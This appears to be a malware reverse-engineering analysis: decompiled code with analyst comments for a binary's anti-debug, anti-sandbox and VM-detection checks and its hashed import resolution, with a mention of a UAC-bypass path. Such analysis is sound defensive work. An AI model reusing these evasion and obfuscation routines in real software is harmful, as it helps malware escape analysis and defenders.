__int64 is_being_debugged_by_vectored_exception_handler_int2d()
{
// Same scheme as the int3 variant above, using int 2Dh (the kernel debug
// service interrupt) instead: VEH registered, flag set to 1, interrupt
// raised, flag read back. Returns the flag, or 1 when the handler could not
// be registered. VectoredHandler_1400020D0 is shared with the int3 check and
// is not on this page.
unsigned int v0; // ebx
__int64 v1; // rax
__int64 v2; // rdi
v0 = 1;
v1 = RtlAddVectoredExceptionHandler_14026B028(1i64, VectoredHandler_1400020D0);
gisDebugger_14000C000 = 1;
v2 = v1;
if ( v1 )
{
_int2d_1400084C0();// __asm { int 2Dh; Windows NT - debugging services: eax = type }
RtlRemoveVectoredExceptionHandler_14026B030(v2);
return (unsigned int)gisDebugger_14000C000;
}
return v0;
}
反沙箱
al-khaser/Generic.cpp at master · LordNoteworthy/al-khaser (github.com)
1、anti_sandbox_check_loaded_dlls_basename
__int64 anti_sandbox_check_loaded_dlls_basename()
{
// Returns 1 when any module whose base-name hash (0x1003F) is listed in v4
// is loaded in this process (get_dll_base(hash, NULL) != 0), else 0. Ten
// hashes are actually checked (v4[0..9], loop bound 0xA); the comment block
// lists twelve - avghooka.dll (0x7E8877C2) and cmdvrt32.dll (0x3AB587D3) do
// not appear in the array. All names are sandbox / AV / analysis user-mode
// hook libraries.
unsigned int v0; // ebx
unsigned int v1; // edi
DWORD *v2; // rsi
_DWORD v4[14]; // [rsp+20h] [rbp-38h] BYREF
// avghookx.dll:0x98C500D9
// avghooka.dll:0x7E8877C2
// snxhk.dll:0x3E0169B6
// sbiedll.dll:0x1E7EACEF
// dbghelp.dll:0x4468A620
// api_log.dll:0x68536B95
// dir_watch.dll:0x73EBBB53
// pstorec.dll:0xDA165168
// vmcheck.dll:0xB24D33A7
// wpespy.dll:0xB1E2CEC6
// cmdvrt64.dll:0x05136992
// cmdvrt32.dll:0x3AB587D3
v0 = 0;
v4[0] = 0x1E7EACEF; // sbiedll.dll
v1 = 0;
v4[1] = 0x4468A620; // dbghelp.dll
v4[2] = 0x68536B95; // api_log.dll
v2 = v4;
v4[3] = 0x73EBBB53; // dir_watch.dll
v4[4] = 0xDA165168; // pstorec.dll
v4[5] = 0xB24D33A7; // vmcheck.dll
v4[6] = 0xB1E2CEC6; // wpespy.dll
v4[7] = 0x5136992; // cmdvrt64.dll
v4[8] = 0x98C500D9; // avghookx.dll
v4[9] = 0x3E0169B6; // snxhk.dll
while ( !get_dll_base(*v2, 0i64) )// any hit -> sandbox
{
++v1;
++v2;
if ( v1 >= 0xA )
return v0;
}
return 1;
}
2、anti_sandbox_check_loaded_dlls_fullname
__int64 anti_sandbox_check_loaded_dlls_fullname()
{
// Returns 1 when the hash of this process's own image name matches one of the
// eight generic "analysis sample" file names in v5, else 0. The name is read
// straight from the PEB: InMemoryOrderModuleList.Flink is the first
// LDR_DATA_TABLE_ENTRY's InMemoryOrderLinks, and Flink[5].Flink is the qword
// 0x50 bytes further on - by the x64 LDR_DATA_TABLE_ENTRY layout that is
// BaseDllName.Buffer (confirm), which fits the hashed values being bare file
// names despite the "fullname" in the function name. ws_hash_0x1003F_140005894
// is the wide-string sibling of s_hash_0x1003F_1400058B8 (not on this page).
unsigned int v0; // ebx
int v1; // edx
int *v2; // rax
unsigned int v3; // ecx
int v5[10]; // [rsp+20h] [rbp-28h] BYREF
// sample.exe 0x7D73878E
// bot.exe 0xEF36424B
// sandbox.exe 0xAF64BC2B
// malware.exe 0x1DBBC879
// test.exe 0xAE6D1D56
// klavme.exe 0x7B3242F2
// myapp.exe 0x14D922B9
// testapp.exe 0x4C92DF53
v0 = 0;
v1 = ws_hash_0x1003F_140005894(NtCurrentPeb()->Ldr->InMemoryOrderModuleList.Flink[5].Flink);// hash of the main module's name
v5[0] = 0x7D73878E; // sample.exe
v2 = v5;
v5[1] = 0xEF36424B; // bot.exe
v5[2] = 0xAF64BC2B; // sandbox.exe
v3 = 0;
v5[3] = 0x1DBBC879; // malware.exe
v5[4] = 0xAE6D1D56; // test.exe
v5[5] = 0x7B3242F2; // klavme.exe
v5[6] = 0x14D922B9; // myapp.exe
v5[7] = 0x4C92DF53; // testapp.exe
while ( v1 != *v2 )
{
++v3;
++v2;
if ( v3 >= 8 )
return v0;
}
return 1;
}
3、anti_sandbox_check_processes_running
__int64 anti_sandbox_check_processes_running()
{
// Returns 1 when a process whose image-name hash is listed in v4 is running
// (get_process_pid_140005F1C(hash) != 0), else 0. Fifteen hashes are checked
// (loop bound 0xF); v4[3] = 0x84BCC8DB and v4[4] = 0x6474D72B are not resolved
// to a name in the author's list. All resolved names are hypervisor guest-tool
// processes (VMware, VirtualBox, QEMU, Xen, Parallels).
unsigned int v0; // ebx
unsigned int v1; // edi
int *v2; // rsi
int v4[16]; // [rsp+20h] [rbp-40h] BYREF
v0 = 0;
// vmtoolsd.exe 0xB8B9C504
// vmwaretray.exe 0x69A0620E
// vmwareuser.exe 0x6017EE43
// VGAuthService.exe 0xE93BE2E0
// vmacthlp.exe 0x149EFC55
// VMSrvc.exe 0x5B098C67
// VMUSrvc.exe 0x2F1FB18E
// qemu-ga.exe 0x861E460F
// xenservice.exe 0xFE8F2B18
// prl_cc.exe 0x42D12D59
// prl_tools.exe 0x0EC5D7AA
// vboxservice.exe 0xE3FA84A4
// vboxtray.exe 0x7CFDD7AF
v4[0] = 0x42D12D59; // prl_cc.exe
v1 = 0;
v4[1] = 0xEC5D7AA; // prl_tools.exe
v4[2] = 0x861E460F; // qemu-ga.exe
v2 = v4;
v4[3] = 0x84BCC8DB;// not resolved in the list above
v4[4] = 0x6474D72B;// not resolved in the list above
v4[5] = 0xB8B9C504; // vmtoolsd.exe
v4[6] = 0x69A0620E; // vmwaretray.exe
v4[7] = 0x6017EE43; // vmwareuser.exe
v4[8] = 0xE93BE2E0; // VGAuthService.exe
v4[9] = 0x149EFC55; // vmacthlp.exe
v4[0xA] = 0xE3FA84A4; // vboxservice.exe
v4[0xB] = 0x7CFDD7AF; // vboxtray.exe
v4[0xC] = 0x5B098C67; // VMSrvc.exe
v4[0xD] = 0x2F1FB18E; // VMUSrvc.exe
v4[0xE] = 0xFE8F2B18; // xenservice.exe
while ( !get_process_pid_140005F1C(*v2) )// any running match -> sandbox
{
++v1;
++v2;
if ( v1 >= 0xF )
return v0;
}
return 1;
}
4、anti_sandbox_check_registry_key_present
__int64 anti_sandbox_check_registry_key_present()
{
// Returns 1 when any of 17 registry keys can be opened with KEY_READ
// (0x20019) through NtOpenKey, else 0. v7[] holds the obfuscated key paths
// and v6[] the lengths handed to deobfuscate_wstring; the decoded paths are
// listed in the comment block below (presumably in v7[0]..v7[0x10] order -
// confirm) and are virtio/QEMU, VMware Tools and VirtualBox guest artefacts
// plus the VBOX__ ACPI table keys. The key handle is closed on a hit.
// (local declarations collapsed in the decompiler view)
v0 = 0;
v6[0] = 0x46;// obfuscated-string lengths, one per v7[] entry
v6[2] = 0x42;
v1 = (WORD **)v7;// cursor over the obfuscated paths
v6[5] = 0x3F;
v2 = (unsigned int *)v6;// cursor over the lengths
v6[7] = 0x35;
v3 = 0;
v6[0xE] = 0x3C;
v6[1] = 0x38;
v6[4] = 0x38;
v6[3] = 0x3D;
v6[8] = 0x2C;
v6[9] = 0x2C;
v6[0xA] = 0x2C;
v6[0xC] = 0x3A;
v6[0xD] = 0x3A;
v6[0x10] = 0x3A;
v7[0] = (__int64)word_140009340;
v7[1] = (__int64)word_1400093D0;
v7[2] = (__int64)word_140009450;
v7[3] = (__int64)word_1400094E0;
v7[4] = (__int64)word_140009560;
v7[5] = (__int64)word_1400095E0;
v7[6] = (__int64)word_140009660;
v7[7] = (__int64)word_1400096D0;
v7[8] = (__int64)word_140009740;
v7[9] = (__int64)word_1400097A0;
v7[0xA] = (__int64)word_140009800;
v7[0xB] = (__int64)word_140009860;
v7[0xC] = (__int64)word_1400098E0;
v7[0xD] = (__int64)word_140009960;
v7[0xE] = (__int64)word_1400099E0;
v7[0xF] = (__int64)word_140009A60;
v7[0x10] = (__int64)word_140009AD0;
v6[6] = 0x37;
v6[0xB] = 0x3D;
v6[0xF] = 0x37;
// \Registry\Machine\SOFTWARE\Microsoft\Virtual Machine\Guest\Parameters
// \Registry\Machine\SYSTEM\ControlSet001\Services\vioscsi
// \Registry\Machine\SYSTEM\ControlSet001\Services\VirtIO-FS Service
// \Registry\Machine\SYSTEM\ControlSet001\Services\VirtioSerial
// \Registry\Machine\SYSTEM\ControlSet001\Services\BALLOON
// \Registry\Machine\SYSTEM\ControlSet001\Services\BalloonService
// \Registry\Machine\SYSTEM\ControlSet001\Services\netkvm
// \Registry\Machine\SOFTWARE\VMware, Inc.\VMware Tools
// \Registry\Machine\HARDWARE\ACPI\DSDT\VBOX__
// \Registry\Machine\HARDWARE\ACPI\FADT\VBOX__
// \Registry\Machine\HARDWARE\ACPI\RSDT\VBOX__
// \Registry\Machine\SOFTWARE\Oracle\VirtualBox Guest Additions
// \Registry\Machine\SYSTEM\ControlSet001\Services\VBoxGuest
// \Registry\Machine\SYSTEM\ControlSet001\Services\VBoxMouse
// \Registry\Machine\SYSTEM\ControlSet001\Services\VBoxService
// \Registry\Machine\SYSTEM\ControlSet001\Services\VBoxSF
// \Registry\Machine\SYSTEM\ControlSet001\Services\VBoxVideo
while ( 1 )
{
v4 = deobfuscate_wstring(*v1, *v2, 1);// decode the next key path
RtlInitUnicodeString_14026B000(v8, v4);
v9.Length = 0x30;// sizeof(OBJECT_ATTRIBUTES)
v9.ObjectName = (PUNICODE_STRING)v8;
v9.RootDirectory = 0i64;
v9.Attributes = 0x40;// OBJ_CASE_INSENSITIVE
*(_OWORD *)&v9.SecurityDescriptor = 0i64;
if ( NtOpenKey(&Handle, 0x20019u, &v9) >= 0 )// KEY_READ; key exists -> sandbox
break;
++v3;
++v2;
++v1;
if ( v3 >= 0x11 )
return v0;
}
v0 = 1;
NtClose(Handle);
return v0;
}
5、anti_sandbox_check_registry_values
__int64 anti_sandbox_check_registry_values()
{
// Returns 1 when one of three registry values contains "VMWARE", "QEMU" or
// "VBOX" (wcsstr on the value data), else 0. Key / value pairs, in order:
//   HARDWARE\DEVICEMAP\Scsi\...\Logical Unit Id 0  / Identifier
//   SYSTEM\ControlSet001\Control\SystemInformation / SystemManufacturer
//   HARDWARE\Description\System                    / SystemBiosVersion
// Per pair: open the key (KEY_READ), query the required size, allocate that
// many bytes from the process heap (flag 8 = HEAP_ZERO_MEMORY), query the
// value as KEY_VALUE_PARTIAL_INFORMATION and accept only REG_SZ (1) or
// REG_MULTI_SZ (7): dword index 1 is Type, the data starts at dword index 3
// (+12 bytes). A key that cannot be opened or a value that does not match
// moves on to the next pair (buffer freed, key closed). On a match the
// function returns without freeing the buffer or closing the key; the
// caller crashes the process on a positive result anyway.
// (local declarations collapsed in the decompiler view)
v0 = 0;
v12 = 0;// value size in / out
// \Registry\Machine\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0
v8[0] = (__int64)deobfuscate_wstring(word_1400090F0, 0x5Fu, 1);
// \Registry\Machine\SYSTEM\ControlSet001\Control\SystemInformation
v8[1] = (__int64)deobfuscate_wstring(word_1400091B0, 0x41u, 0);
// \Registry\Machine\HARDWARE\Description\System
v8[2] = (__int64)deobfuscate_wstring(word_140009240, 0x2Eu, 0);
// Identifier
v9[0] = (__int64)deobfuscate_wstring(word_1400092A0, 0xBu, 0);
// SystemManufacturer
v9[1] = (__int64)deobfuscate_wstring(word_1400092B8, 0x13u, 0);
// SystemBiosVersion
v9[2] = (__int64)deobfuscate_wstring(word_1400092E0, 0x12u, 0);
// VMWARE
v1 = deobfuscate_wstring(word_140009308, 7u, 0);
// QEMU
v2 = deobfuscate_wstring(word_140009318, 5u, 0);
// VBOX
v14 = deobfuscate_wstring(word_140009328, 5u, 0);
v3 = 0;
for ( i = 0i64; ; ++i )
{
RtlInitUnicodeString_14026B000(v10, v8[i]);
v11.Length = 0x30;// sizeof(OBJECT_ATTRIBUTES)
v11.ObjectName = (PUNICODE_STRING)v10;
v11.RootDirectory = 0i64;
v11.Attributes = 0x40;// OBJ_CASE_INSENSITIVE
*(_OWORD *)&v11.SecurityDescriptor = 0i64;
if ( NtOpenKey(&Handle, 0x20019u, &v11) >= 0 )// KEY_READ
break;
LABEL_12:
if ( (unsigned int)++v3 >= 3 )
return v0;
}
RtlInitUnicodeString_14026B000(&v7, v9[i]);
NtQueryValueKey(Handle, &v7, KeyValuePartialInformation, 0i64, 0, &v12);// size query
Heap_14026B010 = (_DWORD *)RtlAllocateHeap_14026B010(NtCurrentPeb()->ProcessHeap, 8i64, v12);
if ( !Heap_14026B010 )
{
LABEL_11:
NtClose(Handle);
goto LABEL_12;
}
// [1] = Type, [3] = start of Data in KEY_VALUE_PARTIAL_INFORMATION
if ( NtQueryValueKey(Handle, &v7, KeyValuePartialInformation, Heap_14026B010, v12, &v12) < 0
|| Heap_14026B010[1] != 1 && Heap_14026B010[1] != 7
|| !wcsstr_14026B038(Heap_14026B010 + 3, v1)
&& !wcsstr_14026B038(Heap_14026B010 + 3, v2)
&& !wcsstr_14026B038(Heap_14026B010 + 3, v14) )
{
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, Heap_14026B010);
goto LABEL_11;
}
return 1;// match: buffer and key handle intentionally left open
}
6、anti_sandbox_check_RSMB
__int64 anti_sandbox_check_RSMB()
{
// SMBIOS check. GetSystemFirmwareTableInformation(0x52534D42 = 'RSMB', ...)
// returns the raw SMBIOS table with its size/status in v10; returns 1 when
// the table contains "QEMU", "qemu", "VirtualBox", "vbox", "VBOX" or
// "VMware" (buffer_contains with the pattern length excluding the NUL),
// else 0. Note TableBuffer is read through the returned pointer one line
// before that pointer is NULL-checked; if the helper can return NULL this
// faults before the check. The buffer is released with RtlFreeHeap after
// the search.
// Defender note: stock hypervisor SMBIOS strings trip this probe, as do the
// ACPI and registry checks on this page.
unsigned int v0; // ebx
SYSTEM_FIRMWARE_TABLE_INFORMATION *SystemFirmwareTableInformation; // rdi
BYTE *TableBuffer; // rsi
BYTE *v3; // rax
BYTE *v4; // rax
BYTE *v5; // rax
BYTE *v6; // rax
BYTE *v7; // rax
BYTE *v8; // rax
int v10; // [rsp+30h] [rbp+8h] BYREF
v0 = 0;
v10 = 0;
SystemFirmwareTableInformation = GetSystemFirmwareTableInformation(0x52534D42u, 0, &v10, 0);// 'RSMB'
TableBuffer = SystemFirmwareTableInformation->TableBuffer;// dereferenced before the NULL check below
if ( SystemFirmwareTableInformation && v10 >= 0 )
{
// QEMU
v3 = deobfuscate_bytes(byte_1400090B8, 5u, 1);
if ( buffer_contains(v3, 4u, TableBuffer, v10)
// qemu
|| (v4 = deobfuscate_bytes(byte_1400090C0, 5u, 1), buffer_contains(v4, 4u, TableBuffer, v10))
// VirtualBox
|| (v5 = deobfuscate_bytes(byte_1400090C8, 0xBu, 1), buffer_contains(v5, 0xAu, TableBuffer, v10))
// vbox
|| (v6 = deobfuscate_bytes(byte_1400090D4, 5u, 1), buffer_contains(v6, 4u, TableBuffer, v10))
// VBOX
|| (v7 = deobfuscate_bytes(byte_1400090DC, 5u, 1), buffer_contains(v7, 4u, TableBuffer, v10))
// VMware
|| (v8 = deobfuscate_bytes(byte_1400090E8, 7u, 1), buffer_contains(v8, 6u, TableBuffer, v10)) )
{
v0 = 1;
}
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, SystemFirmwareTableInformation);
}
return v0;
}
14、anti_sandbox_check_ACPI
__int64 anti_sandbox_check_ACPI()
{
// ACPI check. The first call (last argument 1) enumerates the table IDs of
// provider 0x41435049 ('ACPI'); v11 receives the byte size, each ID being a
// ULONG (count = v11 / 4). Each table is then fetched (last argument 0) and
// searched for "BOCHS", "BXPC" or "VMWARE"; returns 1 on any hit, else 0.
// An enumeration result with the high bit set (an NTSTATUS error) is also
// scored as a hit - the else branch sets v0 = 1 - so a failure here counts
// as "sandbox". Same deref-before-NULL-check pattern as in
// anti_sandbox_check_RSMB (TableBuffer is read before
// SystemFirmwareTableInformation is tested). `v11 >> 2 && v11 >= 4` and the
// following `if ( v3 )` are redundant forms of the same non-empty check.
// (local declarations collapsed in the decompiler view)
v0 = 0;
v11 = 0;
SystemFirmwareTableInformation = GetSystemFirmwareTableInformation(0x41435049u, 0, (int *)&v11, 1);// 'ACPI', enumerate
TableBuffer = (ULONG *)SystemFirmwareTableInformation->TableBuffer;// dereferenced before the NULL check below
if ( SystemFirmwareTableInformation )
{
if ( (v11 & 0x80000000) == 0 )
{
v3 = v11 >> 2;// number of table IDs
if ( v11 >> 2 && v11 >= 4 )
{
if ( v3 )
{
v4 = v3;
do
{
v11 = 0;
v5 = GetSystemFirmwareTableInformation(0x41435049u, *TableBuffer, (int *)&v11, 0);// fetch one table by ID
v6 = v5->TableBuffer;// dereferenced before the NULL check below
if ( v5 && (v11 & 0x80000000) == 0 )
{
// BOCHS
v7 = deobfuscate_bytes(byte_14000909C, 6u, 1);
if ( buffer_contains(v7, 5u, v6, v11)
// BXPC
|| (v8 = deobfuscate_bytes(byte_1400090A4, 5u, 1), buffer_contains(v8, 4u, v6, v11))
// VMWARE
|| (v9 = deobfuscate_bytes(byte_1400090B0, 7u, 1), buffer_contains(v9, 6u, v6, v11)) )
{
v0 = 1;
}
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, v5);
}
++TableBuffer;
--v4;
}
while ( v4 );
}
}
else
{
v0 = 1;// enumeration error is treated as a detection
}
}
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, SystemFirmwareTableInformation);
}
return v0;
}
7、anti_sandbox_check_mac_addr
__int64 __fastcall GetPhyMacAddress_1400062D4(PVOID OutputBuffer)
{
// Read the permanent (burned-in) MAC address of the adapter returned by
// GetNetworkCards_1400072EC into the 6-byte OutputBuffer. Returns 1 on
// success, 0 otherwise. The adapter name is taken 6 wide chars into the
// returned buffer (what those first 12 bytes hold is not visible here);
// a "\Device\<name>" path is built in a heap buffer of (name length + 0xA)
// wide chars, opened with GENERIC_READ|GENERIC_WRITE (0xC0000000), and
// queried with IOCTL_NDIS_QUERY_GLOBAL_STATS / OID_802_3_PERMANENT_ADDRESS
// (4-byte OID in, 6 bytes out). The wcsncpy_0 call shows its count and
// source arguments with swapped casts - most likely a decompiler signature
// mismatch rather than the real argument order. File handle, path buffer
// and adapter list are released on every path.
// (local declarations collapsed in the decompiler view)
v1 = 0;
FileHandle = 0i64;
NetworkCards_1400072EC = GetNetworkCards_1400072EC();
Heap_14026B010 = 0i64;
InputBuffer = OID_802_3_PERMANENT_ADDRESS;
v5 = NetworkCards_1400072EC;// kept for the final free
if ( NetworkCards_1400072EC )
{
v6 = NetworkCards_1400072EC + 6;// adapter name (wide string)
v7 = wcslen_1400058DC(NetworkCards_1400072EC + 6);
Heap_14026B010 = (wchar_t *)RtlAllocateHeap_14026B010(
NtCurrentPeb()->ProcessHeap,
8i64,
2i64 * (unsigned int)(v7 + 0xA));// HEAP_ZERO_MEMORY, (len + 10) wide chars
if ( Heap_14026B010 )
{
// \Device\
v8 = deobfuscate_wstring(word_14000ACD0, 9u, 1);
v9 = wcslen_1400058DC(v6);
wcsncpy_0(Heap_14026B010, (const wchar_t *)(unsigned int)(v9 + 0xA), (size_t)v8);// casts look swapped (decompiler)
v10 = wcslen_1400058DC(v6);
wcsncat(Heap_14026B010, (unsigned int)(v10 + 0xA), v6);// "\Device\<name>"
RtlInitUnicodeString_14026B000(v12, Heap_14026B010);
ObjectAttributes.RootDirectory = 0i64;
ObjectAttributes.Length = 0x30;// sizeof(OBJECT_ATTRIBUTES)
ObjectAttributes.Attributes = 0x40;// OBJ_CASE_INSENSITIVE
ObjectAttributes.ObjectName = (PUNICODE_STRING)v12;
*(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0i64;
if ( NtCreateFile(&FileHandle, 0xC0000000, &ObjectAttributes, &IoStatusBlock, 0i64, 0x80u, 1u, 1u, 0, 0i64, 0) >= 0
&& NtDeviceIoControlFile(
FileHandle,
0i64,
0i64,
0i64,
&IoStatusBlock,
IOCTL_NDIS_QUERY_GLOBAL_STATS,
&InputBuffer,
4u,
OutputBuffer,
6u) >= 0 )// 6-byte MAC written to OutputBuffer
{
v1 = 1;
}
}
}
if ( FileHandle )
NtClose(FileHandle);
if ( Heap_14026B010 )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, Heap_14026B010);
if ( v5 )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, v5);
return v1;
}
__int64 check_mac_addr()
{
// Returns 1 when the first three bytes (OUI) of the adapter's permanent MAC
// match one of the six vendor prefixes at dword_140009084 (Xen, VirtualBox,
// VMware x4 per the list below), else 0 - also 0 when the MAC could not be
// read. The table is indexed as dwords, so each 3-byte OUI presumably sits
// in its own 4-byte slot (confirm). Buf2 is declared as a single char by the
// decompiler but receives the 6-byte IOCTL output; treat it as a 6-byte
// stack buffer.
unsigned int v0; // ebx
char Buf2; // [rsp+30h] [rbp+8h] BYREF
v0 = 0;
if ( (unsigned int)GetPhyMacAddress_1400062D4(&Buf2)
// 0x00, 0x16, 0x3E, // Xensource, Inc.
// 0x08, 0x00, 0x27, // PCS Systemtechnik CmbH (VirtualBox)
// 0x00, 0x05, 0x69, //VMWare, Inc.
// 0x00, 0x0C, 0x29, //VMWare, Inc.
// 0x00, 0x1C, 0x14, //VMWare, Inc.
// 0x00, 0x50, 0x56, //VMWare, Inc.
&& (!memcmp(dword_140009084, &Buf2, 3ui64)
|| !memcmp(&dword_140009084[1], &Buf2, 3ui64)
|| !memcmp(&dword_140009084[2], &Buf2, 3ui64)
|| !memcmp(&dword_140009084[3], &Buf2, 3ui64)
|| !memcmp(&dword_140009084[4], &Buf2, 3ui64)
|| !memcmp(&dword_140009084[5], &Buf2, 3ui64)) )
{
return 1;
}
return v0;
}
8、anti_sandbox_rdtsc
__int64 anti_sandbox_rdtsc()
{
// CPUID timing check: 20 iterations of rdtsc; cpuid(leaf 0); rdtsc, summing
// the deltas in v1. Returns 1 when (v1 - 20), evaluated unsigned, exceeds
// 19999 - i.e. the 20 CPUID executions took more than ~20000 cycles in total
// (~1000 per iteration), or, through the unsigned wrap, fewer than 20 cycles.
// CPUID is intercepted by hypervisors, so the VM-exit cost is what the
// threshold is meant to catch; the constant 19999 is the tunable.
unsigned int v0; // esi
__int64 v1; // rbp
__int64 v2; // r14
unsigned __int64 v3; // rdi
v0 = 0;
v1 = 0i64;// accumulated cycles
v2 = 20i64;// iterations
do
{
v3 = rdtsc_1400084CB();
_RAX = 0i64;// cpuid leaf 0
__asm { cpuid }
v1 += rdtsc_1400084CB() - v3;
--v2;
}
while ( v2 );
if ( (unsigned __int64)(v1 - 20) > 19999 )// unsigned compare: also true for v1 < 20
return 1;
return v0;
}
init_other_imports
// Resolves the installer's remaining imports at runtime. Each DLL name is
// recovered with deobfuscate_wstring and loaded through load_library_w; every
// export is then located by a precomputed hash (get_proc_address_by_hash)
// instead of by name, so none of these APIs appear in the PE import table.
// Function pointers are stored in globals named after the resolved export.
// The Cabinet.dll decompression routines are only resolved on OS versions
// newer than 6.1 (Windows 7 / Server 2008 R2), where the Compression API
// (CreateDecompressor/Decompress/CloseDecompressor) exists.
void __stdcall init_other_imports()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
dll_base = get_dll_base(0x8F7EE672, 0i64); // kernel32
v1 = deobfuscate_wstring(word_140009B48, 0xBu, 1);// L"user32.dll"
user32 = load_library_w(v1);
v3 = deobfuscate_wstring(word_140009B60, 0xDu, 1);// L"advapi32.dll"
advapi32 = load_library_w(v3);
v5 = deobfuscate_wstring(word_140009B80, 0xBu, 1);// L"Rpcrt4.dll"
Rpcrt4 = load_library_w(v5);
v7 = deobfuscate_wstring(word_140009B98, 0xBu, 1);// L"bcrypt.dll"
bcrypt = load_library_w(v7);
v9 = deobfuscate_wstring(word_140009BB0, 0xAu, 1);// L"ole32.dll"
ole32 = load_library_w(v9);
v11 = deobfuscate_wstring(word_140009BC8, 0xCu, 1);// L"Cabinet.dll"
Cabinet = load_library_w(v11);
// user32: window creation and shutdown-block reason (used to hold off a reboot while installing)
CreateWindowExW_14026B1A8 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _DWORD, _DWORD, _DWORD, _DWORD, _QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(user32, 0xC5541C78, 0);// <user32.CreateWindowExW>
ShutdownBlockReasonCreate_14026B1B0 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(
user32,
0xED5632F7,
0);// <user32.ShutdownBlockReasonCreate>
ShutdownBlockReasonDestroy_14026B1B8 = (__int64 (*)(void))get_proc_address_by_hash(user32, 0x7B141D3Fu, 0);// <user32.ShutdownBlockReasonDestroy>
DestroyWindow_14026B1C0 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(user32, 0x770D386Au, 0);// <user32.DestroyWindow>
// kernel32/kernelbase: process creation with attribute lists, file move, sleep
CloseHandle_14026B070 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(dll_base, 0x1B474400u, 0);// <kernel32.CloseHandle>
CreateProcessW_14026B068 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _DWORD, _DWORD, _QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(dll_base, 0x86F5F9E4, 0);// <kernel32.CreateProcessW>
InitializeProcThreadAttributeList_14026B078 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(dll_base, 0xF944ACAA, 0);// <kernelbase.InitializeProcThreadAttributeList>
UpdateProcThreadAttribute_14026B088 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(dll_base, 0x42F1A393u, 0);// <kernelbase.UpdateProcThreadAttribute>
LoadAppInitDlls_14026B080 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(dll_base, 0x9208E3AF, 0);// <kernelbase.LoadAppInitDlls>
Sleep_14026B0E8 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(dll_base, 0xD8A41517, 0);// <kernel32.Sleep>
GetExitCodeProcess_14026B130 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(
dll_base,
0x35FBCBCEu,
0);// <kernel32.GetExitCodeProcess>
MoveFileExW_14026B138 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
dll_base,
0x31B89377u,
0);// <kernel32.MoveFileExW>
// advapi32: service control manager, SID/privilege helpers, SDDL parsing
OpenSCManagerW_14026B040 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
advapi32,
0x32234D44u,
0);// <advapi32.OpenSCManagerW>
OpenServiceW_14026B048 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
advapi32,
0x6D7B016Cu,
0);// <advapi32.OpenServiceW>
QueryServiceStatus_14026B050 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(
advapi32,
0x5D94963Fu,
0);// <advapi32.QueryServiceStatus>
StartServiceW_14026B058 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
advapi32,
0x93A6E504,
0);// <advapi32.StartServiceW>
CloseServiceHandle_14026B060 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(advapi32, 0x1D16D465u, 0);// <advapi32.CloseServiceHandle>
GetUserNameW_14026B090 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(advapi32, 0xB89CDF4B, 0);// <advapi32.GetUserNameW>
ConvertSidToStringSidW_14026B098 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(
advapi32,
0x2313AF10u,
0);// <advapi32.ConvertSidToStringSidW>
LookupAccountNameW_14026B0A0 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(advapi32, 0x194DF59u, 0);// <advapi32.LookupAccountNameW>
CreateWellKnownSid_14026B0C8 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
advapi32,
0xE4310935,
0);// <advapi32.CreateWellKnownSid>
LookupPrivilegeValueW_14026B140 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
advapi32,
0x54B7B41Du,
0);// <advapi32.LookupPrivilegeValueW>
ConvertStringSecurityDescriptorToSecurityDescriptorW_14026B1C8 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(advapi32, 0x2D687ADAu, 0);// <advapi32.ConvertStringSecurityDescriptorToSecurityDescriptorW>
// rpcrt4: RPC client binding used for the PCA interface calls in the UAC-bypass path
RpcStringBindingComposeW_14026B0A8 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
Rpcrt4,
0xDDFC7B14,
0);// <rpcrt4.RpcStringBindingComposeW>
RpcBindingFromStringBindingW_14026B0B0 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(
Rpcrt4,
0x6FB559CDu,
0);// <rpcrt4.RpcBindingFromStringBindingW>
RpcStringFreeW_14026B0B8 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(Rpcrt4, 0x2BEEA5D5u, 0);// <rpcrt4.RpcStringFreeW>
